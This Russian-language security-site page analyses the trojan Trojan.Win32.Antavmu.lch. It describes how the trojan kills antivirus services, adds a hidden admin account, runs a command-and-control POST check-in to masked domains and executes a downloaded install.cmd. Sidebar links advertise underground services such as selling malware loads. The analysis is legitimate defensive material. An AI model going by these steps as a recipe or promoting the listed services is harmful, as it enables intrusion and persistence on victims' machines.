Hack and Secure
Главная
Вход
Регистрация
Суббота, 11.07.2026, 04:21Приветствую Вас Бомж | RSS
Меню

Категории
BugTrack [80]
Bug's and exploits
Malware [27]
Worms, viruses, trojans and other...
ITNews [4]
All IT news from all the world
Взлом [13]
Hacked site's
OpenSource [0]
OpenSource news
Патчи и Обновления [1]
Патчи и Обновления разного рода софта
ALERT [2]
Суд над хакерами
Google [2]
Новости от Google
Hack Attack's [2]
Новости о новых и не очень видов атак
Статистика [6]
Статистика от ведущих компаний по безопасность
ПО [0]
Мелкософт, яблочные, пингвины и мобильное ПО
Soft [0]
All kind of software
SEONews [0]
SEONews
Новости сайта [0]
Новости нашего портала

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

Вход

Главная » 2011 » Июнь » 14 » Trojan.Win32. Antavmu.lch
15:13
Trojan.Win32. Antavmu.lch

Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Программа является приложением Windows (PE-EXE файл). Имеет размер 43856 байт. Упакована при помощи UPX. Распакованный размер — около 77 KБ. Написан на C++.

Инсталляция

Копирует свое тело в системный каталог Windows или во временный каталог текущего пользователя, если в системный каталог скопировать не удалось:

%System%\ms<rnd>.exe
%Temp%\ms<rnd>.exe
Где <rnd> - произвольная последовательность из цифр и букв латинского алфавита, например, "vgzcjw" или "ngszup".

Для автоматического запуска троянец создает в системе службу, которая запускает его исполняемый файл при каждой последующей загрузке Windows, при этом создается следующий ключ реестра:

[HKLM\System\CurrentControlSet\Services\Network Adapter Events]

Деструктивная активность

Троянец выполняет следующие деструктивные действия:

  • Для контроля уникальности своего процесса в системе троянец создает уникальный идентификатор с именем:
    msrdp#v2.1.27
  • Останавливает и удаляет следующие службы:
    Norton Antivirus Service
    Panda Antivirus
    Detector de OfficeScanNT
    McAfee Framework Service
    sharedaccess
    OutpostFirewall
    lnsfw1
    sfilter
    SmcService
    UmxPol
    UmxLU
    UmxAgent
    UmxCfg
    kmxagent
    kmxbig
    kmxcfg
    kmxfile
    kmxfw
    kmxids
    kmxndis
    kmxsbx
    ZoneAlarm
    vsmon
    vsdatant
    IswSvc
    ISWKL
    klif
    klpf
    klpid
    kl1
    WinDefend
    MpsSvc
    BFE
    F-Secure Filter
    F-Secure Gatekeeper
    F-Secure HIPS
    F-Secure Recognizer
    fsbts
    FSFW
    F-Secure Gatekeeper Handler Starter
    FSDFWD
    FSMA
    FSORSPClient
  • Создает пользователя с именем:
    TermUser
    И добавляет пользователя в группы:
    Администраторы
    Пользователи удаленного рабочего стола
  • Отключает отображение имени пользователя в диалоговом окне входа в систему. Для этого создает запись в системном реестре:
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\
    Winlogon\SpecialAccounts\UserList]
    "TermUser"= "0"
  • Проверяет наличие подключения к сети Интернет, путем обращения к следующим URL адресам:
    www.microsoft.com
    www.yahoo.com
    www.msn.com
  • Для получения команд, троянец отправляет запрос вида:
    POST /query222.php HTTP/1.1 Content-Type: application/x-www-form-
    urlencoded Host: <URL> Content-Length: <длинна поля данных в байтах>
    Cache-Control: no-cache
    q=i&id=<серийный номер тома>-
    <версия ОС>&o=< детальная информация об ОС>&v=2.1.27&c=
    <информация о локализации>&l=<язык>&t=16&lip= <IP адрес
    зараженного компьютера> &ts=OK&u=<имя пользователя>
    где <URL> - один из следующих адресов:
    znc***-went.info
    ocr***-tcipty.com
    ocrd***-tc.info
    hvk***-emvbim.com
    esh***-bjsyfjoqt.info
    esht***-bjsyf.com
    xlamz***-lrychj.info
    xlamz***-lr.com
    map***-jragnrw.info
    map***-jra.com
    ftiuh***-tzgk.info
    cqfre***-qwdhmor.com
    cqfre***-qwd.info
    vjyk***-ajpwafh.com
    vjyk***-ajp.info
    kynzm***h-yelpu.com
    kynzm***-y.info
    drgs***-irxei.com
    aodp***-foubfkmp.info
    aodp***-foub.com
    thw***-qyhnuydf.info
    znc***-went.info
    По команде троянец может загружать обновления, загружать и выполнять инсталляцию компонентов предназначенных для предоставления доступа к зараженному компьютеру по RDP (удаленный рабочий стол) протоколу. Загружаемые файлы сохраняются во временно каталоге текущего пользователя:
    %Temp%\tem<rnd1>.tmp
    где <rnd1> - произвольная последовательность из цифр и букв латинского алфавита. Если загруженный файл является архивом, содержащим компоненты для установки, то троянец создает каталог и помещает туда извлеченные файлы:
    %Temp%\b<rnd2>\
    где <rnd2> - произвольная последовательность из цифр и букв латинского алфавита. А затем выполняет команду:
    %System%\cmd.exe /C %Temp%\b<rnd2>\install.cmd
    После чего через час выполняет перезагрузку зараженного компьютера.
  • Троянец сохраняет свои настройки в зашифрованном виде в ключе реестра:
    [HKLM\Software\Microsoft\TermServMonitor]
Категория: Malware | Просмотров: 571 | Добавил: sepos | Теги: Trojan.Win32. Antavmu.lch | Рейтинг: 5.0/1
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Поиск

Календарь
«  Июнь 2011  »
Пн Вт Ср Чт Пт Сб Вс
  12345
6789101112
13141516171819
20212223242526
27282930

Архив

Друзья
Юридические услуги. Представительство в судах. Возврат долгов. Все о FreeBSD и прочих UNIX-like операционных системах Чоткие загрузки для успешных пацанов WE SELL LOADS SMS сервис для Вашего Бизнеса Единая база кидал Elite VPN Black SEO Hash Resolver Каталог сайтов OpenLinks.RU 495ru.ru, Доски объявлений, бесплатные объявления, дать объявление в интернет, подать объявление бесплатно
  • Место для вашей рекламы

  • //-->


    Copyright Hack and Secure Team © 2026